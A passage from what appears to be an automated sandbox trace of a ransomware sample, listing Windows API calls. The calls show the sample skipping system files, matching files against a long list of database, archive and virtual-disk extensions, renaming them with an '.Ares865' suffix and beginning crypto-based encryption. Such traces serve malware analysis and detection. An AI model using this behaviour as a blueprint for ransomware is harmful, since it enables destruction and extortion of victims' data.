(HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.321] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.321] CloseHandle (hObject=0x15c) returned 1 [0085.321] CloseHandle (hObject=0x118) returned 1 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.322] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="aoldtz.exe") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="..") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="windows") returned -1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="bootmgr") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="temp") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="pagefile.sys") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="boot") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="ids.txt") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="ntuser.dat") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="perflogs") returned 1 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2="MSBuild") returned 1 [0085.322] lstrlenW (lpString="usertile39.bmp") returned 14 [0085.322] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 82 [0085.322] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile39.bmp" | out: lpString1="usertile39.bmp") returned="usertile39.bmp" [0085.322] lstrlenW (lpString="usertile39.bmp") returned 14 [0085.322] lstrlenW (lpString="Ares865") returned 7 [0085.322] lstrcmpiW (lpString1="e39.bmp", lpString2="Ares865") returned 1 [0085.322] lstrlenW (lpString=".dll") returned 4 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".dll") returned 1 [0085.322] lstrlenW (lpString=".lnk") returned 4 [0085.322] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".lnk") returned 1 [0085.323] lstrlenW (lpString=".ini") returned 4 [0085.323] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".ini") returned 1 [0085.323] lstrlenW (lpString=".sys") returned 4 [0085.323] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".sys") returned 1 [0085.323] lstrlenW (lpString="usertile39.bmp") returned 14 [0085.323] lstrlenW (lpString="bak") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.323] lstrlenW (lpString="ba_") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.323] lstrlenW (lpString="dbb") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.323] lstrlenW (lpString="vmdk") returned 4 [0085.323] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.323] lstrlenW (lpString="rar") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.323] lstrlenW (lpString="zip") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.323] lstrlenW (lpString="tgz") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.323] lstrlenW (lpString="vbox") returned 4 [0085.323] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.323] lstrlenW (lpString="vdi") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.323] lstrlenW (lpString="vhd") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.323] lstrlenW (lpString="vhdx") returned 4 [0085.323] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.323] lstrlenW (lpString="avhd") returned 4 [0085.323] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.323] lstrlenW (lpString="db") returned 2 [0085.323] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.323] lstrlenW (lpString="db2") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.323] lstrlenW (lpString="db3") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.323] lstrlenW (lpString="dbf") returned 3 [0085.323] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.324] lstrlenW (lpString="mdf") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.324] lstrlenW (lpString="mdb") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.324] lstrlenW (lpString="sql") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.324] lstrlenW (lpString="sqlite") returned 6 [0085.324] lstrcmpiW (lpString1="39.bmp", lpString2="sqlite") returned -1 [0085.324] lstrlenW (lpString="sqlite3") returned 7 [0085.324] lstrcmpiW (lpString1="e39.bmp", lpString2="sqlite3") returned -1 [0085.324] lstrlenW (lpString="sqlitedb") returned 8 [0085.324] lstrcmpiW (lpString1="le39.bmp", lpString2="sqlitedb") returned -1 [0085.324] lstrlenW (lpString="xml") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.324] lstrlenW (lpString="$er") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.324] lstrlenW (lpString="4dd") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.324] lstrlenW (lpString="4dl") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.324] lstrlenW (lpString="^^^") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.324] lstrlenW (lpString="abs") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.324] lstrlenW (lpString="abx") returned 3 [0085.324] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.324] lstrlenW (lpString="accdb") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accdb") returned -1 [0085.324] lstrlenW (lpString="accdc") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accdc") returned -1 [0085.324] lstrlenW (lpString="accde") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accde") returned -1 [0085.324] lstrlenW (lpString="accdr") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accdr") returned -1 [0085.324] lstrlenW (lpString="accdt") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accdt") returned -1 [0085.324] lstrlenW (lpString="accdw") returned 5 [0085.324] lstrcmpiW (lpString1="9.bmp", lpString2="accdw") returned -1 [0085.325] lstrlenW (lpString="accft") returned 5 [0085.325] lstrcmpiW (lpString1="9.bmp", lpString2="accft") returned -1 [0085.325] lstrlenW (lpString="adb") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.325] lstrlenW (lpString="adb") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.325] lstrlenW (lpString="ade") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.325] lstrlenW (lpString="adf") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.325] lstrlenW (lpString="adn") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.325] lstrlenW (lpString="adp") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.325] lstrlenW (lpString="alf") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.325] lstrlenW (lpString="ask") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.325] lstrlenW (lpString="btr") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.325] lstrlenW (lpString="cat") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.325] lstrlenW (lpString="cdb") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.325] lstrlenW (lpString="ckp") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.325] lstrlenW (lpString="cma") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.325] lstrlenW (lpString="cpd") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.325] lstrlenW (lpString="dacpac") returned 6 [0085.325] lstrcmpiW (lpString1="39.bmp", lpString2="dacpac") returned -1 [0085.325] lstrlenW (lpString="dad") returned 3 [0085.325] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.325] lstrlenW (lpString="dadiagrams") returned 10 [0085.325] lstrcmpiW (lpString1="tile39.bmp", lpString2="dadiagrams") returned 1 [0085.325] lstrlenW (lpString="daschema") returned 8 [0085.325] lstrcmpiW (lpString1="le39.bmp", lpString2="daschema") returned 1 [0085.326] lstrlenW (lpString="db-journal") returned 10 [0085.326] lstrcmpiW (lpString1="tile39.bmp", lpString2="db-journal") returned 1 [0085.326] lstrlenW (lpString="db-shm") returned 6 [0085.326] lstrcmpiW (lpString1="39.bmp", lpString2="db-shm") returned -1 [0085.326] lstrlenW (lpString="db-wal") returned 6 [0085.326] lstrcmpiW (lpString1="39.bmp", lpString2="db-wal") returned -1 [0085.326] lstrlenW (lpString="dbc") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.326] lstrlenW (lpString="dbs") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.326] lstrlenW (lpString="dbt") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.326] lstrlenW (lpString="dbv") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.326] lstrlenW (lpString="dbx") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.326] lstrlenW (lpString="dcb") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.326] lstrlenW (lpString="dct") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.326] lstrlenW (lpString="dcx") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.326] lstrlenW (lpString="ddl") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.326] lstrlenW (lpString="dlis") returned 4 [0085.326] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.326] lstrlenW (lpString="dp1") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.326] lstrlenW (lpString="dqy") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.326] lstrlenW (lpString="dsk") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.326] lstrlenW (lpString="dsn") returned 3 [0085.326] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.326] lstrlenW (lpString="dtsx") returned 4 [0085.326] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.326] lstrlenW (lpString="dxl") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.327] lstrlenW (lpString="eco") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.327] lstrlenW (lpString="ecx") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.327] lstrlenW (lpString="edb") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.327] lstrlenW (lpString="epim") returned 4 [0085.327] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.327] lstrlenW (lpString="fcd") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.327] lstrlenW (lpString="fdb") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.327] lstrlenW (lpString="fic") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.327] lstrlenW (lpString="flexolibrary") returned 12 [0085.327] lstrcmpiW (lpString1="ertile39.bmp", lpString2="flexolibrary") returned -1 [0085.327] lstrlenW (lpString="fm5") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.327] lstrlenW (lpString="fmp") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.327] lstrlenW (lpString="fmp12") returned 5 [0085.327] lstrcmpiW (lpString1="9.bmp", lpString2="fmp12") returned -1 [0085.327] lstrlenW (lpString="fmpsl") returned 5 [0085.327] lstrcmpiW (lpString1="9.bmp", lpString2="fmpsl") returned -1 [0085.327] lstrlenW (lpString="fol") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.327] lstrlenW (lpString="fp3") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.327] lstrlenW (lpString="fp4") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.327] lstrlenW (lpString="fp5") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.327] lstrlenW (lpString="fp7") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.327] lstrlenW (lpString="fpt") returned 3 [0085.327] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.327] lstrlenW (lpString="frm") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.328] lstrlenW (lpString="gdb") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.328] lstrlenW (lpString="gdb") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.328] lstrlenW (lpString="grdb") returned 4 [0085.328] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.328] lstrlenW (lpString="gwi") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.328] lstrlenW (lpString="hdb") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.328] lstrlenW (lpString="his") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.328] lstrlenW (lpString="ib") returned 2 [0085.328] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.328] lstrlenW (lpString="idb") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.328] lstrlenW (lpString="ihx") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.328] lstrlenW (lpString="itdb") returned 4 [0085.328] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.328] lstrlenW (lpString="itw") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.328] lstrlenW (lpString="jet") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.328] lstrlenW (lpString="jtx") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.328] lstrlenW (lpString="kdb") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.328] lstrlenW (lpString="kexi") returned 4 [0085.328] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.328] lstrlenW (lpString="kexic") returned 5 [0085.328] lstrcmpiW (lpString1="9.bmp", lpString2="kexic") returned -1 [0085.328] lstrlenW (lpString="kexis") returned 5 [0085.328] lstrcmpiW (lpString1="9.bmp", lpString2="kexis") returned -1 [0085.328] lstrlenW (lpString="lgc") returned 3 [0085.328] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.328] lstrlenW (lpString="lwx") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.329] lstrlenW (lpString="maf") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.329] lstrlenW (lpString="maq") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.329] lstrlenW (lpString="mar") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.329] lstrlenW (lpString="marshal") returned 7 [0085.329] lstrcmpiW (lpString1="e39.bmp", lpString2="marshal") returned -1 [0085.329] lstrlenW (lpString="mas") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.329] lstrlenW (lpString="mav") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.329] lstrlenW (lpString="maw") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.329] lstrlenW (lpString="mdbhtml") returned 7 [0085.329] lstrcmpiW (lpString1="e39.bmp", lpString2="mdbhtml") returned -1 [0085.329] lstrlenW (lpString="mdn") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.329] lstrlenW (lpString="mdt") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.329] lstrlenW (lpString="mfd") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.329] lstrlenW (lpString="mpd") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.329] lstrlenW (lpString="mrg") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.329] lstrlenW (lpString="mud") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.329] lstrlenW (lpString="mwb") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.329] lstrlenW (lpString="myd") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.329] lstrlenW (lpString="ndf") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.329] lstrlenW (lpString="nnt") returned 3 [0085.329] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.329] lstrlenW (lpString="nrmlib") returned 6 [0085.330] lstrcmpiW (lpString1="39.bmp", lpString2="nrmlib") returned -1 [0085.330] lstrlenW (lpString="ns2") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.330] lstrlenW (lpString="ns3") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.330] lstrlenW (lpString="ns4") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.330] lstrlenW (lpString="nsf") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.330] lstrlenW (lpString="nv") returned 2 [0085.330] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.330] lstrlenW (lpString="nv2") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.330] lstrlenW (lpString="nwdb") returned 4 [0085.330] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.330] lstrlenW (lpString="nyf") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.330] lstrlenW (lpString="odb") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.330] lstrlenW (lpString="odb") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.330] lstrlenW (lpString="oqy") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.330] lstrlenW (lpString="ora") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.330] lstrlenW (lpString="orx") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.330] lstrlenW (lpString="owc") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.330] lstrlenW (lpString="p96") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.330] lstrlenW (lpString="p97") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.330] lstrlenW (lpString="pan") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.330] lstrlenW (lpString="pdb") returned 3 [0085.330] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.330] lstrlenW (lpString="pdm") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.331] lstrlenW (lpString="pnz") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.331] lstrlenW (lpString="qry") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.331] lstrlenW (lpString="qvd") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.331] lstrlenW (lpString="rbf") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.331] lstrlenW (lpString="rctd") returned 4 [0085.331] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.331] lstrlenW (lpString="rod") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.331] lstrlenW (lpString="rodx") returned 4 [0085.331] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.331] lstrlenW (lpString="rpd") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.331] lstrlenW (lpString="rsd") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.331] lstrlenW (lpString="sas7bdat") returned 8 [0085.331] lstrcmpiW (lpString1="le39.bmp", lpString2="sas7bdat") returned -1 [0085.331] lstrlenW (lpString="sbf") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.331] lstrlenW (lpString="scx") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.331] lstrlenW (lpString="sdb") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.331] lstrlenW (lpString="sdc") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.331] lstrlenW (lpString="sdf") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.331] lstrlenW (lpString="sis") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.331] lstrlenW (lpString="spq") returned 3 [0085.331] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.331] lstrlenW (lpString="te") returned 2 [0085.331] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.331] lstrlenW (lpString="teacher") returned 7 [0085.332] lstrcmpiW (lpString1="e39.bmp", lpString2="teacher") returned -1 [0085.332] lstrlenW (lpString="tmd") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.332] lstrlenW (lpString="tps") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.332] lstrlenW (lpString="trc") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.332] lstrlenW (lpString="trc") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.332] lstrlenW (lpString="trm") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.332] lstrlenW (lpString="udb") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.332] lstrlenW (lpString="udl") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.332] lstrlenW (lpString="usr") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.332] lstrlenW (lpString="v12") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.332] lstrlenW (lpString="vis") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.332] lstrlenW (lpString="vpd") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.332] lstrlenW (lpString="vvv") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.332] lstrlenW (lpString="wdb") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.332] lstrlenW (lpString="wmdb") returned 4 [0085.332] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.332] lstrlenW (lpString="wrk") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.332] lstrlenW (lpString="xdb") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.332] lstrlenW (lpString="xld") returned 3 [0085.332] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.332] lstrlenW (lpString="xmlff") returned 5 [0085.332] lstrcmpiW (lpString1="9.bmp", lpString2="xmlff") returned -1 [0085.332] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.Ares865") returned 90 [0085.333] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.ares865"), dwFlags=0x1) returned 1 [0085.333] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.334] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.335] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.335] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.335] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, 